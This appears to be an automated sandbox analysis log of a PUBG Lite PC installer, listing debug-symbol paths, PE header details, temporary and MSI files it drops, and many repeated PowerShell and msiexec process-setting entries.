Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdbll? source: powershell.exe, 00000007.00000002.65296318896.0000020D99A66000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\JobRelease\win\Release\custact\x86\aischeduler2.pdb source: pubg-lite-pc.exe, 00000001.00000003.64943521396.00000000048AC000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb34e089Q source: powershell.exe, 00000007.00000002.65297824816.0000020D99AE1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\JobRelease\win\Release\custact\x86\Prereq.pdb source: pubg-lite-pc.exe, 00000001.00000003.64943521396.00000000048AC000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\JobRelease\win\Release\custact\x86\Prereq.pdbi source: pubg-lite-pc.exe, 00000001.00000003.64943521396.00000000048AC000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb^ source: powershell.exe, 00000007.00000002.65296318896.0000020D99A66000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000007.00000003.65205693106.0000020D996DE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.65297522924.0000020D99ACA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.65294289062.0000020D99761000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000016.00000003.65651739159.000002B419E6F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000016.00000003.65651850982.000002B419E7B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000003.65913272165.0000024B7ABC8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdbdb source: powershell.exe, 00000018.00000002.66080950626.0000024B7A86B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb34e089g source: powershell.exe, 00000007.00000002.65297824816.0000020D99AE1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000016.00000003.65651739159.000002B419E6F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000016.00000003.65651850982.000002B419E7B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbcal\@ source: powershell.exe, 00000016.00000003.65650615625.000002B419E30000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\Microsoft.PowerShell.Commands.Utility.pdbon PCA 2011 source: powershell.exe, 00000018.00000002.66085246807.0000024B7AB5C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ion.pdb source: powershell.exe, 00000016.00000003.65647796522.000002B419BD0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdbK source: powershell.exe, 00000018.00000002.66080950626.0000024B7A86B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\JobRelease\win\Release\custact\x86\lzmaextractor.pdb source: pubg-lite-pc.exe, 00000001.00000003.64942039930.0000000004770000.00000004.00001000.00020000.00000000.sdmp
Source: pubg-lite-pc.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: pubg-lite-pc.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: pubg-lite-pc.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: pubg-lite-pc.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: pubg-lite-pc.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\pubg-lite-pc.exeCode function: 1_2_00A461BC push ecx; ret 1_2_00A461CF
Source: C:\Users\user\Desktop\pubg-lite-pc.exeCode function: 1_2_0097A2A0 push ecx; mov dword ptr [esp], 3F800000h1_2_0097A332
Source: C:\Users\user\Desktop\pubg-lite-pc.exeCode function: 1_2_00934460 push ecx; mov dword ptr [esp], ecx1_2_00934461
Source: C:\Users\user\Desktop\pubg-lite-pc.exeCode function: 1_2_00958DDD pushfd ; retf 1_2_00958DDE
Source: C:\Users\user\Desktop\pubg-lite-pc.exeCode function: 1_2_00997260 push ecx; mov dword ptr [esp], 3F800000h1_2_009973A8
Source: C:\Users\user\Desktop\pubg-lite-pc.exeCode function: 1_2_6D98AD8C push ecx; ret 1_2_6D98AD9F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FF85AC6D2A5 pushad ; iretd 7_2_00007FF85AC6D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FF85AD82315 pushad ; iretd 7_2_00007FF85AD8232D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FF85AD800BD pushad ; iretd 7_2_00007FF85AD800C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FF85AC6D2A5 pushad ; iretd 17_2_00007FF85AC6D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FF85AD82315 pushad ; iretd 17_2_00007FF85AD8232D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FF85AD800BD pushad ; iretd 17_2_00007FF85AD800C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FF85AD92300 pushad ; iretd 22_2_00007FF85AD9232D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FF85AD900BD pushad ; iretd 22_2_00007FF85AD900C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FF85AD905B0 pushad ; retf 22_2_00007FF85AD905ED
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FF85AD90625 pushad ; retf 22_2_00007FF85AD905ED
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 24_2_00007FF85AD92300 pushad ; iretd 24_2_00007FF85AD9232D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF85ADA2300 pushad ; iretd 26_2_00007FF85ADA232D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF85ADA00BD pushad ; iretd 26_2_00007FF85ADA00C1
Source: shiE676.tmp.1.drStatic PE information: section name: .wpp_sf
Source: shiE676.tmp.1.drStatic PE information: section name: .didat
Source: shiE992.tmp.4.drStatic PE information: section name: .wpp_sf
Source: shiE992.tmp.4.drStatic PE information: section name: .didat
Source: shi4BB.tmp.6.drStatic PE information: section name: .wpp_sf
Source: shi4BB.tmp.6.drStatic PE information: section name: .didat
Source: C:\Users\user\Desktop\pubg-lite-pc.exeCode function: 1_2_009B7020 LoadLibraryW,GetProcAddress,FreeLibrary,1_2_009B7020
Source: shiE992.tmp.4.drStatic PE information: 0x6EFB496D [Mon Jan 1 11:41:33 2029 UTC]
Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\shi5E5.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI101A.tmpJump to dropped file
Source: C:\Users\user\Desktop\pubg-lite-pc.exeFile created: C:\Users\user\AppData\Local\Temp\Common Apps\1.3.5\decoder.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1CA4.tmpJump to dropped file
Source: C:\Users\user\Desktop\pubg-lite-pc.exeFile created: C:\Users\user\AppData\Local\Temp\MSIE7DF.tmpJump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\shiE992.tmpJump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\shiEAFA.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI395.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI2F8.tmpJump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\shi4BB.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI19B2.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1A3F.tmpJump to dropped file
Source: C:\Users\user\Desktop\pubg-lite-pc.exeFile created: C:\Users\user\AppData\Local\Temp\INAE5E9.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI3F4.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE516.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI3E43.tmpJump to dropped file
Source: C:\Users\user\Desktop\pubg-lite-pc.exeFile created: C:\Users\user\AppData\Local\Temp\shiE676.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI299.tmpJump to dropped file
Source: C:\Users\user\Desktop\pubg-lite-pc.exeFile created: C:\Users\user\AppData\Local\Temp\MSIE937.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1ADC.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIA27C.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIA4.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1115.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI7331.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI101A.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI3F4.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1CA4.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE516.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI3E43.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI299.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1ADC.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI395.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIA27C.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI2F8.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIA4.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1115.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI19B2.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI7331.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1A3F.tmpJump to dropped file
Source: C:\Users\user\Desktop\pubg-lite-pc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
